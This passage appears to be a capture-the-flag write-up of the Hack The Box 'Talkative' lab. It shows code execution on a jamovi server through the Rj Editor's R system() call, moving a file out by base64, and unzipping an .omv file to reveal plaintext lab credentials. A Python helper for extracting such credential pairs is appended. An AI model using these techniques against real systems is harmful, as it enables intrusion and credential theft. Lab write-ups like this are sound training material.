Web


Nmap discovered a web server on the target port 8080. The running service is Tornado httpd 5.0.

At the webroot, I got redirected to the resource at /?id=0014f14f-bf37-49f5-839a-923348d42298. It seems to be a spreadsheet, much like Microsoft Excel.

The title suggests that it is jamovi.

jamovi (stylized in all lower-case as jamovi) is a free and open-source computer program for data analysis and performing statistical tests.

I was able to get the version information through the left-hand side menu. This particular version of jamovi is suffering from an XSS vulnerability, but it doesn’t seem all that relevant for now.

Another interesting thing about the instance is that it has the Rj Editor installed, which is a module that allows you to use the R programming language to analyze data from within jamovi.

Clicking into Modules, I have an option to open up the library.

It shows the installed modules. The installed Rj Editor is version 1.0.8, which doesn’t seem to be vulnerable. However, since it literally just runs R code, I can very likely get code execution through it.

Rj Editor


Inside the Rj Editor, I can write R code on the left-hand side and run it via Ctrl+Shift+Enter.

system("ls -la", intern = TRUE)

Using the system() function to call the OS command ls -la. It works. The output appears to be the system root directory, but there is a .dockerenv file, which indicates that I am very likely inside a Docker container.

Docker Container


The current user is the root user.

Based on the process information, this Docker container is solely used for the jamovi instance, which is then likely proxied through the host’s web service, Tornado httpd.

Another interesting thing is that I am unable to execute any network-related commands.

The IP address is 172.18.0.2.

Checking the home directory of the root user, there are two interesting files:

  • The .jamovi file, which is likely responsible for setting up the environment variables
  • The bolt-administration.omv file, which must be relevant to Talkative, running on port 80

bolt-administration.omv


Since it doesn’t seem possible to move the file around in the conventional way, I will get the file out via base64 encoding.

┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ cat base64.txt | base64 -d

Here is the recovered file on Kali. It’s in binary format, as the original file extension was omv.

The omv extension is used exclusively by jamovi.

┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ cat base64.txt | base64 -d > bolt-administration.omv

I will do the conversion and attempt to open it using the target jamovi instance, so that I can check the content.

It seems the jamovi instance only supports opening local files.

I remember seeing the Documents directory within the home directory of the root user. This might be the directory shown as the local documents directory in the installed jamovi, in which case I could just copy the bolt-administration.omv file into the Documents directory.

Like so, and it shows up here.

The target jamovi instance failed to open the file, as it requires a newer version of jamovi.

┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ file bolt-administration.omv 
bolt-administration.omv: Zip archive data, at least v2.0 to extract, compression method=deflate

Since the omv file is really a PKZIP archive, I will just attempt to unzip it.

┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ unzip bolt-administration.omv 
Archive:  bolt-administration.omv
  inflating: META-INF/MANIFEST.MF    
  inflating: meta                    
  inflating: index.html              
  inflating: metadata.json           
  inflating: xdata.json              
  inflating: data.bin                
  inflating: 01 empty/analysis

Content extracted.

┌──(kali㉿kali)-[~/…/htb/labs/talkative/bolt-administration]
└─$ cat xdata.json          
{"A": {"labels": [[0, "Username", "Username", false], [1, "matt@talkative.htb", "matt@talkative.htb", false], [2, "janit@talkative.htb", "janit@talkative.htb", false], [3, "saul@talkative.htb", "saul@talkative.htb", false]]}, "B": {"labels": [[0, "Password", "Password", false], [1, "jeO09ufhWD<s", "jeO09ufhWD<s", false], [2, "bZ89h}V<S_DA", "bZ89h}V<S_DA", false], [3, ")SQWGm>9KHEA", ")SQWGm>9KHEA", false]]}, "C": {"labels": []}}                                                                                                                                        

Checking one of the extracted files, xdata.json, reveals the user information, including credentials:

  • matt:jeO09ufhWD<s
  • janit:bZ89h}V<S_DA
  • saul:)SQWGm>9KHEA

These credentials must be relevant to the Bolt instance running on the target port 80.
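As an added example (not from this writeup), a small Python reader for the .omv container handled above: it opens the zip, pulls out xdata.json and turns each column's label rows into plain values, so a responder can triage a recovered .omv for plaintext credentials stored in a spreadsheet without installing jamovi. The sample archive is constructed in memory with placeholder names and passwords, and the meaning of the label fields is inferred from the xdata.json shown on this page, not taken from a jamovi specification.

```python
import io
import json
import zipfile

# Constructed sample data mirroring the xdata.json layout seen on the page:
# each column is a key, each label row looks like [code, label, import_value, flag].
# The field meanings are an assumption based on that sample, not a jamovi spec.
SAMPLE_XDATA = {
    "A": {"labels": [[0, "Username", "Username", False],
                     [1, "alice@example.test", "alice@example.test", False],
                     [2, "bob@example.test", "bob@example.test", False]]},
    "B": {"labels": [[0, "Password", "Password", False],
                     [1, "placeholder-pw-1", "placeholder-pw-1", False],
                     [2, "placeholder-pw-2", "placeholder-pw-2", False]]},
    "C": {"labels": []},
}


def build_sample_omv() -> bytes:
    """Return a constructed in-memory .omv (a deflate zip) carrying xdata.json.

    A real .omv also holds meta, index.html, metadata.json and data.bin;
    only the members this reader touches are included here.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("xdata.json", json.dumps(SAMPLE_XDATA))
    return buf.getvalue()


def omv_label_columns(omv_bytes: bytes) -> dict:
    """Parse xdata.json from an .omv and return {header: [cell values]}.

    Treats the first label row of each column as the header (e.g. "Username")
    and the remaining rows as cell values, as in the page's sample. Columns
    with no labels are skipped.
    """
    with zipfile.ZipFile(io.BytesIO(omv_bytes)) as zf:
        xdata = json.loads(zf.read("xdata.json"))
    columns = {}
    for column in xdata.values():
        labels = column.get("labels", [])
        if not labels:
            continue
        header = labels[0][1]
        columns[header] = [row[1] for row in labels[1:]]
    return columns


def credential_pairs(columns: dict) -> list:
    """Pair the Username and Password columns row by row for triage reporting."""
    return list(zip(columns.get("Username", []), columns.get("Password", [])))
```

Pointing omv_label_columns at the bytes of a real bolt-administration.omv would yield the same Username/Password columns the unzip and cat steps above exposed by hand.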